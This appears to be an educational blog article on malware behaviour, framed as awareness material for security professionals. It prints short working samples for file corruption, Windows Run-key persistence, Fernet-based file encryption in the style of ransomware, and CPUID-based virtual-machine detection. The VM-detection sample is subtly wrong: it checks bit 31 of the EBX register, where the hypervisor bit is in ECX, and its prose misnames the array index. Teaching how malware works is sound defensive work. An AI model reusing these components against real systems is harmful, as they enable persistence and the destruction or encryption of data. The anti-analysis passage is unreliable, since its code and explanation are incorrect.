Malware Functionality and File Manipulation
Disclaimer
This article is intended to provide technical information about malware analysis and functionality and has been created in accordance with relevant privacy laws such as the Personal Data Protection Law (KVKK) and the General Data Protection Regulation (GDPR). Its purpose is to guide cybersecurity professionals and researchers in understanding how malware operates. Using this information for malicious purposes is illegal and may lead to criminal penalties. The author cannot be held responsible for any misuse of this information. Developing or distributing malware is against the law, and this article is shared solely for educational and awareness purposes.
WARNING!
The code examples in this article are intended for educational and research purposes only. It is crucial that these codes are not tested on malware or used on your own machines. Such code can harm your system, put your data at risk, or lead to legal consequences. Therefore, avoid running these codes on your computers or in unauthorized environments. Any security testing or analysis should be conducted solely within the framework of legal permissions and ethical standards. The author cannot be held responsible for any misuse of this code or for any negative consequences that may arise.
— — — — — — — — — — — — — — — — — — — — — —
Malware is software designed to infiltrate users’ systems for purposes such as data theft, file corruption, ransomware, or conducting malicious operations. This article will explain, in technical detail, how a malware affects systems through file manipulation.
Basic Operation Structure of Malware
- Malware gains access to the target system using user error, security vulnerabilities, or social engineering techniques.
- It begins to harm the user by modifying, corrupting, or encrypting important files on the system.
- To remain active when the system is restarted, it employs various methods (such as making registry edits or adding scheduled tasks) to establish persistence within the system.
- The key concern is the execution of malicious operations, which may include data theft, file encryption, or other harmful actions.
File Manipulation Example
A malware may use simple file read and write operations to modify specific files on the target system.
For example, let’s examine a file corruption example in the C programming language:
#include <stdio.h>
#include <stdlib.h>
void corrupt_file(const char *filename) {
FILE *file = fopen(filename, "r+b");
if (file == NULL) {
printf("Could not open file: %s\n", filename);
return;
}
// The first few bytes of the file are corrupted with the code line here
fseek(file, 0, SEEK_SET);
for (int i = 0; i < 10; i++) {
fputc(0xFF, file); // Corrupt data is written at the beginning of the file
}
printf("%s file has been successfully corrupted.\n", filename);
fclose(file);
}
int main() {
const char *target_file = "target_file.txt";
corrupt_file(target_file);
return 0;
}The above code corrupts the first 10 bytes of a file. A malicious software could apply this type of approach to critical system files in order to crash the system.
Registry Manipulation
In Windows-based systems, malware can configure itself to run at every startup by making additions to the registry. This operation is typically performed under the “RUN” key.
For example, we can examine the following code:
#include <windows.h>
#include <stdio.h>
void persist_malware() {
HKEY hKey;
const char* malwarePath = "C:\\malicious.exe";
// The software adds itself under the Run key
if (RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_WRITE, &hKey) == ERROR_SUCCESS) {
RegSetValueEx(hKey, "MalwareExample", 0, REG_SZ, (const BYTE*)malwarePath, strlen(malwarePath));
RegCloseKey(hKey);
printf("Malware has been successfully added to the registry.\n");
} else {
printf("An error occurred.\n");
}
}
int main() {
persist_malware();
return 0;
}The above code adds a malicious software to the Windows registry to ensure it runs at every startup. This technique allows the malware to be “persistent,” meaning it automatically executes whenever the system is started.
File Encryption and Ransomware
The fundamental principle of ransomware is to encrypt the user’s files, blocking access to them, and demanding a ransom in return.
For example:
from cryptography.fernet import Fernet
# Fernet is a powerful and easy-to-use tool for symmetric encryption in Python.
# It is normally used to protect data against unauthorized access.
# We are using it here to demonstrate how malware encrypts files.
# This code block generates a key
def create_key():
key = Fernet.generate_key()
with open("key.key", "wb") as key_file:
key_file.write(key)
return key
# This part handles the file encryption
def encrypt_file(filename, key):
fernet = Fernet(key)
with open(filename, "rb") as file:
file_data = file.read()
encrypted_data = fernet.encrypt(file_data)
with open(filename, "wb") as file:
file.write(encrypted_data)
# Here the key is generated and the file is encrypted
key = create_key()
encrypt_file("target_file.txt", key) # Changed variable name to reflect English
print("File has been successfully encrypted.")This Python code encrypts a file using the “cryptography” library. Malware can apply this type of operation extensively on the file system, encrypting all of the user’s important files.
Anti-Analysis Techniques
A malware can use various techniques to avoid analysis. For example, it can detect virtual machines or analysis environments.
To illustrate this, we can examine the following code:
#include <windows.h>
int is_virtual_machine() {
unsigned int cpu_info[4] = {0};
__cpuid(cpu_info, 1);
return ((cpu_info[1] >> 31) & 1); // Virtual machine detection is performed here
}
int main() {
if (is_virtual_machine()) {
printf("This program cannot be run on a virtual machine.\n");
exit(1);
} else {
printf("The program is running on a normal system.\n");
}
}The above code uses the “CPUID” instruction to detect a virtual machine. If it is determined that the system is a virtual machine, the malware stops executing.
A specific bit in the array (the 31st bit of the first element) is checked. This bit is commonly used as a pointer for virtual machine detection. If this bit is 1, it indicates that the system is running on a virtual machine.
— — — — — — — — — — — — — — — — — — — — —
Malware uses various techniques to manipulate users and systems data and cause harm. They can carry out attacks through methods such as file manipulation, registry modifications, and ransomware. The examples provided above give an insight into the technical details of malware and highlight the importance of taking precautions against such threats. Thank you to everyone who read and contributed.
You can send me a connection request via “LinkedIn”.
